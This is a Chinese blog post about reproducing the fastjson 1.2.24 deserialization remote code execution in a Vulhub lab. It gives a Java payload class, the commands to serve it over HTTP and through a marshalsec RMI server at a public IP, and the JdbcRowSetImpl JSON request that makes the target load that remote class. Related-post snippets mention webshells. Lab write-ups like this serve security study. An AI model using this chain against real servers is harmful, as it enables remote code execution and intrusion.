fastjson 1.2.24 反序列化导致任意命令执行漏洞

最新推荐文章于 2024-03-09 19:46:13 发布
最新推荐文章于 2024-03-09 19:46:13 发布
阅读量267 收藏 1
点赞数
文章标签: web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzzz1284/article/details/128565816
版权
文章详细描述了如何利用Fastjson的autoType特性在Java8u102环境中执行命令,通过com.sun.rowset.JdbcRowSetImpl的利用链和RMI服务器,实现了远程代码执行。首先启动http服务器并上传命令执行代码,然后使用marshalsec创建RMI服务器,最后通过构造特定的JSON输入触发JNDI注入。
摘要由CSDN通过智能技术生成

漏洞环境均基于Vulhub

原因

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

参考资料:

复现

因为目标环境是Java 8u102,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。

首先编译并上传命令执行代码,在服务器上启动

python3 -m http.server 6666 

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

编译

然后我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class:

编译工具命令

 mvn clean package -DskipTests

执行命令,使用marshalsec-0.0.3-SNAPSHOT-all.jar起一个RMI服务器,监听9999端口,并制定加载远程类 TouchFile.class 

sudo java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://216.127.164.238/#TouchFile" 7777
* Opening JRMP listener on 7777

修改包

POST / HTTP/1.1
Host: 101.43.191.94:8090
Cookie: Drupal.toolbar.collapsed=0; SESS22dffecb4ee16b176dfaba7e79921e1b=RCqrP2wGfPJ8b-NiDZHVawEzHYRDvdePidTFKGTkjZ4; SESS774a3e35a05f5f3c2b895b1876c81591=Ip_NOvE5I5f1R-0NJ5dGDzQfshBlHc0HayNlRTBEoI0; ECS[visit_times]=3; PHPSESSID=9e592edb435245ffea196dc34a2a9218
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 169

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://216.127.164.238:7777/TouchFile",
        "autoCommit":true
    }
}

n1ght_X
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
薛定谔嘚喵博客
05-30 1170
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,的作用就是把java对象转换为json形式,也可 以用来将json转换为java对象。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
漏洞靶场】--fastjson 1.2.24 反序列化导致任意命令执行漏洞
hello word的博客
01-06 537
漏洞环境 以上是fastjson搭建好的默认页面。 exp准备 准备好如下Java代码。 import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; public class Exploit{ public Exploit() throws Exception { Process p = Runtime.getRuntime().exec(new String[]{"/bin/ba
复现fastjson 1.2.24 反序列化导致任意命令执行漏洞
DXfighting_的博客
04-15 480
生成带有PHP马的class文件 把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在 的目录,Python起一个http服务。 使用marshalsec项目 启动RMI服务, 监听9999端口并加载远程类TouchFile.class: 使用burpsuite抓包后改GET包为POST包,然后在发送的请求数据包中输入以下如图payload 之后使用蚁剑连...
Fastjson 1.2.24 反序列化导致任意命令执行漏洞
不曾扬帆,何以至远方
07-15 899
fastjson 1.2.24 反序列化
fastjsonfastjson 1.2.24 反序列化导致任意命令执行
bqnagus
10-01 867
fastjsonfastjson 1.2.24 反序列化导致任意命令执行
fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
qq_51163834的博客
06-24 835
fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象。
fastjson1.2.24反序列化RCE
最新发布
06-24
**Fastjson 1.2.24 反序列化远程代码执行漏洞详解** 在Java开发中,Fastjson是一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本...
Fastjson 1.2.24 反序列化导致任意命令执行漏洞复现(CVE-2017-18349)
Welcome To Myon'Blog !
03-09 2334
Fastjson 是一个 Java 库,用于在 Java 对象和 JSON 数据之间进行转换,它提供了一种简单而高效的方式来序列化 Java 对象为 JSON 格式的字符串,以及将 JSON 字符串反序列化为 Java 对象。Fastjson 支持各种类型的 Java 对象,包括预先存在但没有源代码的对象。
fastjson 1.2.24 反序列化导致任意命令执行漏洞 复现超详细步骤
yc11223344的博客
07-05 1413
在本地启动环境: 首先我们需要一个java的环境 新建文件夹并且在文件夹里面建一个txt文件命名为TouchFile.java,里面写入代码 cmd在文件夹目录运行 就会看到生成了一个class文件可以看一下这位师傅的文章python2.x执行命令为python3.x执行命令为要在class文件下执行命令,进行监听8000端口 我们可以访问:本机ip:8000 我们借助marshalsec项目开启RMI服务,监听9999端口 下载完marshalsec之后,进到该目录下cmd运行会生成一个target文件夹
Fastjson1.2.24反序列化导致任意命令执行(CVE-2017-18349)
m0_58596609的博客
01-05 1398
Fastjson1.2.24反序列化导致任意命令执行(CVE-2017-18349) 超详细
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3324
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
Fastjson 1.2.22-24 反序列化漏洞分析
weixin_34235371的博客
11-19 487
目录 0x00 废话 0x01 简单介绍 FastJson的简单使用 0x02 原理分析 分析POC 调试分析 0x03 复现过程 0x04 参考文章 0x00 废话 ...
解决fastjson无序的问题--从源码的角度来看
Stand by
10-27 6714
以前的fastjson我不清楚.. 而且这个问题网上好像没什么答案... so... 看了下源码,不得不说阿里大佬写的代码是真的给力啊... 解决方案主要有两种...   方案1:定义一个类继承TypeReference<T> T为LinkedHashMap<String,Object> 例如: import java.util.LinkedHashMa...
Fastjson反序列化远程代码执行漏洞
m0_56033865的博客
06-15 4978
据国家网络与信息安全信息通报中心监测发现,开源Java开发组件Fastjson存在反序列化远程代码执行漏洞。攻击者可利用上述漏洞实施任意文件写入、服务端请求伪造等攻击行为,造成服务器权限被窃取、敏感信息泄漏等严重影响。先贴一个解决漏洞的方案: 不过任何升级一定会伴随或大或小的bug,一定要对业务的影响做评估。下面对漏洞原理进行介绍: fastjson 是阿里巴巴开发的 java语言编写的高性能 JSON 库,用于将数据在 Json 和 Java Object之间相互转换。它没有用java的序列化机制,而是自
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值